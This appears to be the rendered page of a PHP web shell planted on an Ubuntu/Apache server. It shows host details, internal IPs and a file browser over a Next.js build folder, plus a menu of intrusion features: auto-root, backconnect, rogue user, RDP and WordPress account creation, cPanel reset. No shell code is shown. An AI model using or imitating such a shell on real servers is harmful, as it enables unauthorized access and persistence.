Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next /
dist /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
analysis
[ DIR ]
drwxrwxr-x
babel
[ DIR ]
drwxrwxr-x
jest
[ DIR ]
drwxrwxr-x
manifests
[ DIR ]
drwxrwxr-x
output
[ DIR ]
drwxrwxr-x
polyfills
[ DIR ]
drwxrwxr-x
swc
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
webpack
[ DIR ]
drwxrwxr-x
webpack-build
[ DIR ]
drwxrwxr-x
build-context.d.ts
1.87
KB
-rw-rw-r--
build-context.js
1.57
KB
-rw-rw-r--
build-context.js.map
863
B
-rw-rw-r--
collect-build-traces.d.ts
768
B
-rw-rw-r--
collect-build-traces.js
24.28
KB
-rw-rw-r--
collect-build-traces.js.map
14.36
KB
-rw-rw-r--
compiler.d.ts
464
B
-rw-rw-r--
compiler.js
2.83
KB
-rw-rw-r--
compiler.js.map
1.82
KB
-rw-rw-r--
deployment-id.d.ts
69
B
-rw-rw-r--
deployment-id.js
466
B
-rw-rw-r--
deployment-id.js.map
311
B
-rw-rw-r--
entries.d.ts
3.88
KB
-rw-rw-r--
entries.js
26.05
KB
-rw-rw-r--
entries.js.map
16.14
KB
-rw-rw-r--
generate-build-id.d.ts
138
B
-rw-rw-r--
generate-build-id.js
860
B
-rw-rw-r--
generate-build-id.js.map
451
B
-rw-rw-r--
get-babel-config-file.d.ts
77
B
-rw-rw-r--
get-babel-config-file.js
856
B
-rw-rw-r--
get-babel-config-file.js.map
485
B
-rw-rw-r--
handle-externals.d.ts
1.34
KB
-rw-rw-r--
handle-externals.js
14.08
KB
-rw-rw-r--
handle-externals.js.map
6.95
KB
-rw-rw-r--
index.d.ts
3.42
KB
-rw-rw-r--
index.js
112.15
KB
-rw-rw-r--
index.js.map
59.85
KB
-rw-rw-r--
is-writeable.d.ts
74
B
-rw-rw-r--
is-writeable.js
653
B
-rw-rw-r--
is-writeable.js.map
381
B
-rw-rw-r--
load-entrypoint.d.ts
878
B
-rw-rw-r--
load-entrypoint.js
5.02
KB
-rw-rw-r--
load-entrypoint.js.map
3.19
KB
-rw-rw-r--
load-jsconfig.d.ts
310
B
-rw-rw-r--
load-jsconfig.js
4.87
KB
-rw-rw-r--
load-jsconfig.js.map
2.5
KB
-rw-rw-r--
noop-react-dom-server-legacy.d...
102
B
-rw-rw-r--
noop-react-dom-server-legacy.j...
846
B
-rw-rw-r--
noop-react-dom-server-legacy.j...
314
B
-rw-rw-r--
spinner.d.ts
173
B
-rw-rw-r--
spinner.js
3.84
KB
-rw-rw-r--
spinner.js.map
1.8
KB
-rw-rw-r--
type-check.d.ts
570
B
-rw-rw-r--
type-check.js
7.03
KB
-rw-rw-r--
type-check.js.map
3.53
KB
-rw-rw-r--
utils.d.ts
8.09
KB
-rw-rw-r--
utils.js
64.75
KB
-rw-rw-r--
utils.js.map
42.27
KB
-rw-rw-r--
webpack-config.d.ts
4.27
KB
-rw-rw-r--
webpack-config.js
102.53
KB
-rw-rw-r--
webpack-config.js.map
51.23
KB
-rw-rw-r--
worker.d.ts
124
B
-rw-rw-r--
worker.js
936
B
-rw-rw-r--
worker.js.map
133
B
-rw-rw-r--
write-build-id.d.ts
87
B
-rw-rw-r--
write-build-id.js
559
B
-rw-rw-r--
write-build-id.js.map
351
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : build-context.d.ts
import type { LoadedEnvFiles } from '@next/env'; import type { Ora } from 'next/dist/compiled/ora'; import type { Rewrite, Redirect } from '../lib/load-custom-routes'; import type { __ApiPreviewProps } from '../server/api-utils'; import type { NextConfigComplete } from '../server/config-shared'; import type { Span } from '../trace'; import type getBaseWebpackConfig from './webpack-config'; import type { TelemetryPlugin } from './webpack/plugins/telemetry-plugin'; export declare function resumePluginState(resumedState?: Record<string, any>): void; export declare function getProxiedPluginState<State extends Record<string, any>>(initialState: State): State; export declare function getPluginState(): Record<string, any>; export declare const NextBuildContext: Partial<{ compilerIdx?: number; pluginState: Record<string, any>; dir: string; buildId: string; config: NextConfigComplete; appDir: string; pagesDir: string; rewrites: { fallback: Rewrite[]; afterFiles: Rewrite[]; beforeFiles: Rewrite[]; }; originalRewrites: { fallback: Rewrite[]; afterFiles: Rewrite[]; beforeFiles: Rewrite[]; }; originalRedirects: Redirect[]; loadedEnvFiles: LoadedEnvFiles; previewProps: __ApiPreviewProps; mappedPages: { [page: string]: string; } | undefined; mappedAppPages: { [page: string]: string; } | undefined; mappedRootPaths: { [page: string]: string; }; hasInstrumentationHook: boolean; telemetryPlugin: TelemetryPlugin; buildSpinner: Ora; nextBuildSpan: Span; reactProductionProfiling: boolean; noMangling: boolean; appDirOnly: boolean; clientRouterFilters: Parameters<typeof getBaseWebpackConfig>[1]['clientRouterFilters']; previewModeId: string; fetchCacheKeyPrefix?: string; allowedRevalidateHeaderKeys?: string[]; }>;
Close